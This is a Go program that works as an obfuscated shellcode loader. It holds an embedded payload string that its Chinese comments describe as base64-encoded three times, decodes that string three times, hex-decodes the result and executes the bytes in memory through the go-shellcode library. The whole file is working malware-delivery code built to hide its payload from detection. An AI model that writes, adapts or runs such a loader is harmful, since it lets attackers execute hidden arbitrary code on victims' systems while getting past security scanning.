package main

import (
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"os"

	shellcode "github.com/brimstone/go-shellcode"
)

func main() {
	// 通过参数传低进来
	// if len(os.Args) != 2 {
	// 	fmt.Printf("Must have shellcode of file\n")
	// 	os.Exit(1)
	// }

	// 集成编译打包
	// 三次base64之后的字符串
	sc := "V20xTk1FOUVaM3BhVkZKdFRVZFZORmw2UVhkTlJFRjNUVVJCTUUxVVZYaE9SRVV4VFVSVmVVNVVSVEZPYWxFMFRYcEdhMDFxV1RGT1JHYzBXV3BWZVU1cVFUQlBSR2hwVGxSSmVFOUVVVFJQUjBreFRXcEpkMDVFWnpSWmFtTjVUbFJCTUU5RVFtMVphbU13V1ZSU2FFNUhVWHBOVjAwMVRrUm5lazFYVFhkWlYwMTZXWHBaZUU0eVRYZE5ha3BxVFdwQk1FMVhUWGhaZW10M1drUlJlRTFFUm1wTlYxVjVXbGRSTVUxcVVYaE9WRVV3VDBSb2FVNVVTWGxOUkdocFRrUkplbGw2VVRSTlJFWnJUVVJvYVU5RVFUUlBSRUYzVFVSQmQwMUVVVFJQUkZacVRVUmpNRTVxWXpCUFJFRjRXa1JCTVUxRWFHbE9SR2Q0VDBSUk1FOUhTVEJOUkVsM1RrUnJkMDFYVVhkYVZFMHhUbXBSTkZwdFdtcFBWRkY0VDBkSmVrNUVaelJPUkdkM1RWZFJNazVIVVhwTlYwMDFUa1JuZWsxWFRYZFpWMDB3VFZkTmVGbDZhM2RhUkZGNFRVUkdhazFVVFRSYVZFRXpUbGRaZUU1SFRYZE5lbEpxVFdwUmQwOUVVVEZOZW14clRWUmpNVnBFWnpGUFJGRXdUMGRKTUUxRVNUQk9SR3QzVFZkUmQwNXFXVEJOVkdocFRVZE5NRTlFVVRCUFIwa3dUVVJHYWs1RWEzZE5WMUYzVGtSRk5GbHFRVEJQUkdjd1QwUkJlRnBFUVRCTlZGVTBUa1JGTVU5RVZteE9WR3N4V1ZSUmVFNVVaekJOVkZVMVRrUkZNVmxVVVRSUFJFNXNXWHBKZDA1RVJURk5iVnB0V2xSQk1VOUVVWGhPVkdzeFdWUlJORTlIU1hoTmJWVTFUbFJrYlZwdFdtMWFiVmt4V2tSUk5GbHRSWGROVkVGM1RVUkJkMDFFUVhkTlJFRjNUVVJCZDA1RVp6UmFSR2hyVFVSRmQwMVVRWGROUkVFd1RWZEthRTE2UlRSWmFscHRUMFJrYlZwdFVURlpiVXB0VFVkSk1WbFVTVEZPYWxGNFdXMUdhRTVxYXpGWmJWRTFXa2RhYlZwRVZUQlBSR2Q2V1hwUmVVOUVUbXBOUkZreldYcENhRTlFUW0xWmJWVjNUbnBWZDA1WFNtbE9SR040VFhwamVVNXRXVEpaVkVGM1RsUnJNRTFVWnpWYVIwWnRXbTFSTVU1cVRUSk5WRnBxVG1wTmVWcFVXVEZPZW1jeVRsUkJkdz09"
	// 三次base64解码
	deStrBytes := Base64DecodeString(sc)
	deStrBytes = Base64DecodeString(deStrBytes)
	deStrBytes = Base64DecodeString(deStrBytes)

	sc_bin, err := hex.DecodeString(deStrBytes)
	if err != nil {
		fmt.Printf("Error decoding arg 1: %s\n", err)
		os.Exit(1)
	}

	shellcode.Run(sc_bin)
}

func Base64DecodeString(str string) string {
	resBytes, _ := base64.StdEncoding.DecodeString(str)
	return string(resBytes)
}
